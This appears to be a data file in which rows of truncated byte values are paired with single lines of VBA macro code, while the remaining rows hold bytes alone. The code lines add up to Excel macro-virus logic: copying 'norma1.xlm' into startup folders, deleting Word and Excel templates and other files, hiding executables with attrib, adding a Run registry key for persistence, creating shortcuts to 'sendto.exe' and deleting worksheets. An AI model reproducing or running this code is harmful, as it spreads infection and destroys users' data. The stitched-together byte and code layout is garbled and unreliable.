	33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 …	set lnk=w.CreateShortcut(fold.path & "\" & ff.name)
	164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 23…	lnk.TargetPath="c:\sendto.exe"
	205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 …	lnk.IconLocation="shell32.dll,6"
	69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 1…	lnk.save
	222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 1…	goto e2
	12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239…	end if
	241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 …	next
	227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 21…	e2:
	146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38…	fso.deletefile "c:\normal.dot"
	242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 10…	fso.deletefile "c:\norma1.xlm"
	233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 …	fso.deletefile "c:\internet.exe"
	175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 2…	w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
	149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 …	w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
	251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 14…	w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"
	248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 5…	w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
	197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 …	End If
	233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 …	Workbooks.Open Application.StartupPath & "\norma1.xlm"
	158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 19…	thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)
	208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 9…	workbooks("norma1.xlm").save
	204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 17…	fso.copyfile Application.StartupPath & "\norma1.xlm",myfolder,true
	55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 18…	a1:
	48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 20…	fso.deletefile "c:\excel.txt"
	248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 …	Application.DisplayAlerts = False
	98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 …	for i=1 to thisworkbook.sheets.count
	130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130…	if left(thisworkbook.sheets(i).name,3)="模块表" then
	90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 …	ThisWorkbook.Sheets(i).Delete
	191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 2…	end if
	95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 1…	next
	221 248 76 140 24 59 1 180 62 26 157 89 111 218 56 211 248 49 89 184 233 141 72 145 16 132 70 93 101 218 33 178 148 49 77 184 15 100 129 232 184 14 147 46 71 79 218 178 200 32 70 55 123 90 176 15 183 130 128 98 214 86 179 174 83 146 215 212 227 174 50 232 50 43 254 130 233 168 248 3 106 99 97 197 222 101 112 132 1 254 227 175 76 232 178 20 239 19 70 230 42 119 4 219 43 171 39 105 123 3 185 144 99…	Application.DisplayAlerts = True
	124 181 78 183 149 160 122 57 218 221 138 29 93 12 119 86 61 129 250 26 237 204 164 25 245 115 222 152 210 85 141 84 181 184 229 14 65 65 125 205 93 95 160 124 8 78 178 26 49 151 133 14 58 217 204 92 132 152 67 72 211 70 165 6 146 58 178 36 198 66 225 104 164 220 36 79 126 255 177 147 72 161 206 107 193 175 44 63 102 234 96 128 87 139 136 152 7 186 126 182 26 135 156 176 144 133 78 200 151 101 13…	ThisWorkbook.Saved=True
	172 174 153 215 87 93 81 49 175 175 178 164 47 197 185 185 186 239 142 14 153 184 67 51 232 80 68 218 150 6 189 178 20 149 138 252 202 12 107 105 27 111 13 69 251 164 242 185 62 81 204 31 157 213 55 163 124 174 125 70 163 199 178 139 204 168 15 122 100 183 220 123 83 95 21 177 140 229 14 114 100 194 181 86 91 87 108 50 183 21 23 160 137 69 227 230 197 36 167 111 2 234 7 188 54 212 15 252 10 213 3…	End Sub
	224 223 91 103 17 114 218 221 180 48 165 85 90 124 180 245 50 136 25 157 205 110 90 189 60 205 44 235 48 51 97 118 233 160 19 16 27 233 226 219 188 118 113 187 229 134 131 135 159 171 240 190 208 32 22 220 178 249 74 252 35 53 139 228 254 15 156 154 226 219 26 32 70 10 189 221 90 57 166 159 121 137 228 192 218 50 223 134 76 136 121 139 191 60 176 235 162 11 51 218 168 242 241 117 214 123 25 132 1…
	44 127 97 31 34 129 242 221 102 244 241 65 143 211 232 5 167 155 55 170 100 200 141 134 152 226 235 7 202 229 123 171 205 163 30 61 201 84 121 52 123 5 196 166 78 139 142 87 25 230 110 157 123 205 101 62 77 117 200 120 136 37 207 184 60 75 206 122 141 101 212 186 148 154 21 173 3 225 62 67 34 211 60 51 14 29 52 11 225 21 110 174 229 101 47 231 236 129 24 99 148 125 210 224 55 20 230 169 130 116 2…
	106 137 62 216 106 80 99 225 196 147 27 168 179 203 1 2 154 171 52 250 60 66 215 153 35 28 114 165 69 209 153 35 68 73 208 121 214 22 11 196 150 98 194 185 112 17 228 66 9 126 13 58 103 18 108 239 254 64 80 129 83 24 1 32 62 156 54 114 239 10 177 235 10 225 225 33 224 41 36 56 28 120 226 173 155 223 150 96 11 38 238 33 66 186 211 60 4 164 14 110 84 60 22 159 116 181 3 3 19 28 146 198 130 119 152 …
	181 251 85 187 242 148 46 208 23 4 162 156 245 239 226 202 207 43 22 224 228 10 194 124 80 173 15 64 189 133 11 170 255 20 192 221 29 221 239 13 174 61 65 72 119 94 253 250 189 170 216 96 188 61 253 206 221 189 151 169 42 106 79 22 191 245 46 189 115 132 61 209 16 212 247 247 81 135 68 110 132 174 81 219 49 206 129 177 239 222 144 160 205 227 19 106 126 84 243 160 147 67 0 70 200 79 60 129 176 15…
	3 123 46 147 109 101 164 101 99 197 32 50 1 57 12 192 20 141 34 11 150 57 63 155 57 56 86 74 238 222 93 165 103 138 168 66 185 3 10 157 172 194 79 17 52 43 19 86 101 29 154 35 223 163 0 26 150 23 194 103 195 58 197 135 80 118 136 116 63 156 40 249 25 56 150 34 66 152 211 132 31 110 117 237 163 230 39 135 225 242 229 141 88 22 198 186 111 11 179 67 251 87 178 195 199 159 111 103 38 18 196 135 97 1…
	223 91 167 236 152 87 54 70 238 50 223 38 121 140 155 121 207 102 174 195 138 25 240 58 98 69 228 140 82 135 145 223 136 59 180 48 168 110 193 157 132 92 128 200 13 133 125 31 80 38 112 191 38 15 144 62 10 46 188 83 186 84 62 10 82 2 221 208 153 23 50 170 184 99 163 48 34 143 108 81 30 249 34 94 196 123 174 1 10 173 29 80 121 131 191 51 1 205 1 239 149 42 240 94 226 40 54 15 196 132 249 118 94 76…
	98 246 158 77 167 26 52 29 63 145 238 142 231 156 172 173 88 94 233 8 243 148 219 62 13 83 6 238 10 69 141 32 84 99 162 130 13 203 58 110 247 222 32 153 37 42 69 16 163 51 219 247 20 147 230 112 98 250 63 123 57 228 107 253 28 52 31 182 171 117 95 125 71 35 55 230 43 85 146 60 42 214 155 232 142 136 21 168 32 142 12 236 235 136 117 164 24 1 16 17 80 234 66 7 227 27 171 13 238 158 180 187 40 218 2…
	167 162 114 161 212 169 199 22 241 92 157 206 109 139 214 166 67 108 231 149 253 53 90 103 200 220 36 82 117 237 106 239 10 36 10 6 62 176 87 53 211 253 104 150 245 202 168 114 161 252 221 83 16 11 55 42 253 163 99 174 154 213 169 150 17 45 177 174 131 185 16 11 162 111 106 80 217 248 142 183 251 90 255 178 87 83 53 209 100 143 98 71 191 182 77 100 19 179 184 116 241 47 157 7 45 175 66 236 164 12…
	245 67 232 8 206 182 59 31 63 6 134 139 140 69 210 234 103 249 235 103 15 23 154 134 49 143 204 179 241 75 65 121 53 46 52 249 146 92 100 24 123 99 146 125 236 141 179 163 206 66 236 234 113 123 158 82 210 124 235 168 38 223 194 44 167 232 139 168 233 124 104 53 126 90 173 96 125 60 199 147 225 48 211 16 229 233 135 135 219 6 79 210 248 147 29 162 228 106 60 74 75 54 11 73 166 139 115 66 77 71 22…
	189 97 253 18 22 116 103 34 193 154 47 250 16 147 42 176 221 18 90 142 29 192 86 128 80 56 41 197 251 199 211 233 48 71 4 83 49 14 112 141 67 187 112 89 2 110 243 64 41 50 65 173 181 5 127 108 180 42 118 1 184 178 3 231 182 189 170 2 223 175 12 133 43 106 189 209 83 124 145 146 2 87 92 7 130 24 203 241 28 152 141 231 54 127 90 208 17 119 87 112 4 189 67 79 129 142 104 65 125 9 122 196 36 41 228 2…
	210 179 200 189 72 234 154 59 39 141 117 236 168 89 132 201 235 150 131 91 214 193 207 205 33 73 162 41 64 69 79 179 200 208 50 44 239 162 70 238 142 231 168 156 124 167 87 117 52 205 27 194 217 95 117 227 197 110 131 23 151 145 192 253 252 205 242 197 41 55 45 226 178 168 151 130 14 149 51 32 182 79 123 158 103 221 160 133 230 97 7 104 205 195 222 232 150 34 23 198 219 234 203 242 143 196 51 194…
	39 225 54 190 10 180 241 252 225 221 109 124 139 198 234 2 189 53 226 54 137 74 43 115 188 120 18 232 157 10 46 102 122 122 142 253 106 94 158 49 175 210 125 141 99 18 178 57 133 55 69 6 125 94 199 57 52 176 213 77 125 23 9 105 48 29 103 38 232 198 229 222 103 149 109 156 187 39 233 192 216 91 16 251 148 91 178 229 253 199 205 188 93 151 101 246 14 164 119 168 162 252 24 161 254 237 214 142 207 1…
	122 129 249 165 141 103 179 145 217 113 205 49 89 127 243 10 179 168 205 163 13 194 118 90 90 34 75 136 203 136 109 231 229 60 173 19 82 11 166 69 94 178 41 70 26 253 137 133 115 254 220 50 209 38 102 205 141 209 143 211 185 200 37 61 181 82 202 166 198 147 196 137 200 8 223 196 194 42 81 223 50 136 84 153 187 176 185 212 38 109 49 39 249 132 218 208 58 66 59 234 41 3 27 227 22 117 75 229 200 87 …
	154 237 221 246 249 42 241 246 204 237 181 143 23 25 173 239 64 150 161 143 171 182 45 174 167 44 229 36 76 123 242 114 129 81 21 90 182 177 149 182 235 228 90 218 120 86 166 117 24 39 197 124 25 146 91 116 197 26 100 37 99 254 180 42 101 137 137 78 122 214 138 44 131 18 39 163 86 183 22 72 50 14 89 21 124 30 213 218 132 116 205 61 65 217 11 216 109 91 233 73 53 114 91 10 253 52 110 17 134 89 6 1…
	167 234 49 24 124 82 133 31 18 116 176 240 245 15 160 176 87 129 98 115 115 95 78 225 44 245 240 117 146 149 234 202 19 109 147 53 58 134 58 52 150 190 46 85 147 105 102 68 213 212 214 102 154 105 26 178 117 117 64 238 210 169 76 35 109 109 42 85 143 30 60 121 54 131 61 89 48 39 1 103 180 103 136 159 139 171 59 96 40 152 227 38 52 218 68 10 36 125 29 253 137 20 93 3 234 68 138 189 172 20 200 244 …
	250 181 28 60 141 25 81 36 69 251 97 173 182 167 48 129 79 193 193 105 14 81 184 175 192 194 69 11 23 125 173 249 90 211 139 223 60 16 161 105 160 119 219 119 144 79 63 235 205 190 125 235 223 85 143 136 115 17 129 115 193 251 151 160 255 137 248 85 162 208 121 95 71 5 1 14 89 63 57 78 186 202 143 207 188 202 255 122 15 129 43 148 97 152 22 233 231 247 255 236 184 31 52 157 161 71 49 172 20 95 14…
	103 73 144 32 83 9 130 59 218 140 151 95 254 74 120 57 171 226 229 171 129 151 43 13 47 79 99 188 28 97 25 154 1 114 6 180 2 208 110 64 23 1 93 7 244 5 242 24 196 47 95 103 188 252 82 241 114 171 192 203 235 171 96 221 251 44 120 209 241 63 235 226 235 127 211 197 7 193 139 119 130 23 109 130 23 173 130 23 175 5 47 94 246 169 26 14 226 187 215 147 84 248 46 219 164 9 128 38 2 2 210 22 73 141 47 1…
	184 241 245 183 95 252 116 238 185 79 79 158 154 59 17 213 3 108 138 15 220 122 61 219 134 120 251 209 186 100 219 163 206 219 4 30 95 57 239 140 2 61 33 190 183 146 110 250 22 191 252 171 109 166 199 225 227 195 207 56 19 228 68 143 65 13 79 194 114 161 205 4 46 84 87 170 43 213 149 234 154 213 186 238 22 117 93 128 75 240 62 75 223 115 142 121 86 123 73 155 89 34 165 1 246 28 216 21 122 77 104 …
	195 78 6 92 58 202 171 66 75 199 49 8 122 56 244 30 19 250 46 211 171 24 244 6 109 12 122 20 129 209 205 190 173 172 90 70 89 46 223 75 199 32 232 181 66 175 230 190 182 216 176 91 213 123 157 17 15 189 161 42 6 61 138 193 0 208 19 31 33 91 62 175 191 173 163 60 213 161 191 160 119 75 232 117 161 63 6 212 203 243 246 105 11 189 83 168 165 71 81 24 170 79 122 89 216 100 209 90 82 105 115 191 90 13…
	223 198 160 71 17 25 89 6 112 167 203 235 186 217 187 85 127 146 158 239 211 11 79 35 218 40 227 95 66 107 134 222 78 20 122 244 101 12 18 117 75 87 163 252 15 165 120 246 140 195 11 0 128 67 75 237 93 123 120 21 197 21 63 187 55 55 185 185 9 225 134 71 132 128 225 66 40 70 228 177 73 32 16 64 115 81 148 136 32 81 68 104 3 72 72 136 188 146 180 1 139 150 182 132 82 193 22 91 176 106 165 45 74 180…
	196 148 95 43 63 62 183 139 43 191 115 186 120 193 81 214 145 210 211 188 86 74 79 238 200 72 134 210 180 234 196 190 24 253 99 177 152 102 241 250 213 226 241 11 38 107 144 199 171 40 19 241 201 37 162 176 58 106 31 57 211 75 170 79 239 124 62 209 127 182 17 157 4 206 228 115 69 247 1 240 17 148 222 71 80 126 135 91 173 102 122 189 44 149 158 220 145 33 41 126 179 56 25 166 178 36 57 211 235 96 …
	185 54 215 11 125 136 158 69 182 69 70 214 149 251 150 60 183 118 210 250 117 140 127 185 93 31 80 68 105 14 79 120 172 73 131 185 232 228 160 225 212 147 6 210 181 52 12 79 167 113 52 158 202 104 46 125 133 158 167 29 180 71 221 171 246 246 230 120 251 122 175 246 14 241 150 12 82 52 85 115 104 78 45 93 203 208 186 105 221 181 108 173 183 118 149 166 232 170 158 166 167 235 153 122 150 158 171 2…
	250 254 123 239 111 25 209 207 243 232 19 176 255 135 157 126 73 19 54 123 55 113 158 121 61 153 93 126 191 176 139 31 18 118 255 38 97 55 111 38 238 43 104 6 174 98 118 186 176 177 153 127 128 217 241 59 133 13 205 252 4 57 192 239 68 217 7 136 251 1 254 74 237 237 123 86 246 146 250 250 69 180 136 106 13 59 121 139 18 213 126 102 225 89 119 186 81 31 137 122 35 133 121 30 126 45 134 31 32 211 1…
	191 21 181 215 26 50 177 152 21 184 255 13 81 214 5 113 42 64 253 170 24 187 118 235 191 151 200 191 2 207 25 118 229 177 201 51 54 142 246 111 8 170 127 26 74 173 70 233 13 70 15 142 231 254 43 134 14 243 8 157 20 137 180 113 197 70 191 107 62 92 111 132 193 231 238 198 232 159 152 128 254 116 161 118 243 218 211 45 234 223 190 227 222 176 250 239 194 40 95 140 107 79 164 255 177 186 221 49 220 …
	110 211 92 130 173 112 9 200 94 11 43 77 222 138 46 32 187 230 31 209 29 69 93 148 43 44 137 114 209 225 202 167 56 82 228 40 155 205 211 106 238 140 213 245 81 9 122 214 207 239 83 104 6 13 90 227 162 84 115 125 93 147 203 240 169 184 4 159 101 186 193 192 51 223 73 179 18 72 99 248 79 145 55 133 156 52 63 141 243 153 52 152 154 148 0 63 91 240 110 202 48 124 41 140 239 79 83 140 121 43 227 135 …
	67 75 220 93 15 112 83 199 153 223 247 244 108 75 178 85 100 254 4 7 28 88 43 54 150 193 8 217 49 14 201 17 34 255 227 79 98 140 177 13 49 169 26 44 91 207 88 69 150 132 36 199 38 144 86 14 134 115 166 92 107 200 77 135 164 190 68 36 153 14 189 50 115 110 175 71 72 203 52 34 161 135 147 161 55 78 38 211 33 51 204 141 73 50 119 244 38 153 19 153 36 117 139 252 116 187 251 190 183 122 8 104 75 154 …
	215 136 141 241 59 116 242 70 198 47 101 252 70 29 127 6 236 214 246 190 233 106 72 60 160 192 14 118 58 237 18 50 57 189 177 92 10 88 185 60 21 159 203 244 178 211 88 130 122 131 150 242 123 228 187 70 90 152 188 11 210 80 237 35 101 55 178 81 76 210 147 105 132 159 143 50 241 139 200 250 167 147 148 101 151 73 93 62 133 178 246 230 233 191 24 9 55 26 64 158 200 197 73 85 211 219 179 254 172 231…
	183 135 143 82 89 118 26 213 254 125 41 75 158 190 233 100 229 159 202 140 15 185 208 78 48 180 147 211 121 80 255 128 147 128 83 128 23 1 167 1 175 0 38 1 103 0 105 130 172 253 3 90 1 139 8 142 153 212 219 214 206 232 236 203 163 253 221 168 142 155 39 117 252 92 118 175 100 236 186 171 29 249 63 200 255 9 34 79 223 233 101 143 215 199 116 122 232 27 211 73 232 199 244 20 224 68 110 166 60 70 83…
	64 164 109 162 166 119 10 77 17 93 115 208 158 65 57 28 221 59 224 11 134 238 91 115 111 237 106 22 183 222 85 43 74 236 91 11 234 183 20 130 4 251 52 159 142 197 167 249 162 39 139 199 153 157 94 18 50 74 210 221 79 144 238 112 209 120 67 224 195 134 184 61 141 98 57 233 129 193 48 110 99 243 35 132 39 1 103 132 76 121 150 163 22 81 171 29 163 8 122 68 53 127 23 89 125 36 217 111 154 134 93 180 …
	146 83 241 121 150 207 36 132 91 97 30 210 158 91 225 185 51 55 83 14 101 232 159 69 90 190 227 72 173 135 221 186 181 234 36 200 95 4 121 90 162 212 172 66 176 82 32 99 115 33 202 88 167 197 59 145 123 61 78 3 210 153 68 171 215 5 188 166 23 16 173 227 106 63 205 165 167 70 47 50 69 207 17 116 234 244 157 66 29 104 227 195 77 59 118 54 108 107 107 107 106 233 216 185 173 189 169 205 221 30 236 1…
	213 26 233 84 106 127 49 67 57 3 22 229 171 61 173 67 238 15 249 61 81 57 130 244 109 209 140 50 221 186 144 205 79 154 189 51 16 223 202 226 155 233 252 5 19 74 166 213 178 250 254 3 225 46 22 190 234 250 126 24 34 179 45 94 25 192 85 184 234 222 106 71 245 61 142 123 238 113 84 85 57 215 101 148 220 208 23 53 187 48 211 71 188 245 125 77 129 168 28 126 82 245 4 52 255 165 219 160 206 255 94 3 1…
	116 198 66 185 43 144 212 220 224 138 217 227 205 114 111 212 126 97 97 107 172 198 90 137 171 43 18 117 237 114 212 137 123 35 193 88 254 83 97 121 11 98 190 159 221 22 65 154 99 136 52 207 176 149 186 134 175 231 218 26 45 131 57 255 81 48 104 176 48 39 112 174 127 216 180 169 247 245 59 54 69 176 181 37 24 237 67 243 240 150 240 40 30 196 147 134 142 62 57 182 97 99 255 222 222 68 189 28 118 2…
